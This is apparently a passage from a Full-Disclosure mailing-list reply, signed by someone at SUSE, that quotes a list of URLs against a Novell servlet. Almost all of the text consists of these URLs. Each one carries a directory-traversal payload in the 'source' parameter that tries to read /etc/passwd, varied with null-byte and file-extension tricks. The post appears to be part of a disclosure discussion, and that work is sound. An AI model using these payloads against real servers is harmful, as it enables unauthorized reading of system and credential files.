> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=1
> [46]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
> [47]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.jpg|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
> [48]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.html|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
> [49]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.css|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
> [50]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.php|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
> [51]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.txt|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
> [52]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.inc|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
> [53]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=../../../../../../../../../../etc/passwd%00.png|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
> [54]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
> [55]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=//../../../../../../../../etc/passwd%00en|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2
> [56]
> http://www.novell.com/servlet/CRS?reference_name=|+|amp|+|-op=%25|+|amp|+|Action=Start+Search|+|amp|+|Submit=Start+Search|+|amp|+|source=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00|+|amp|+|full_text_limit=showcase_verbiage+%2C+press_release|+|amp|+|MaxRows=0|+|amp|+||+|amp|+||+|amp|+|language_id=0|+|amp|+|region_id=0|+|amp|+|country_id=0|+|amp|+|industry=2

> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-- 
Working, but not speaking, for the following german company:
SUSE LINUX Products GmbH, HRB 16746 (AG Nuernberg)
Geschaeftsfuehrer: Jeff Hawn, Jennifer Guild, Felix Imendoerffer

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Reply via email to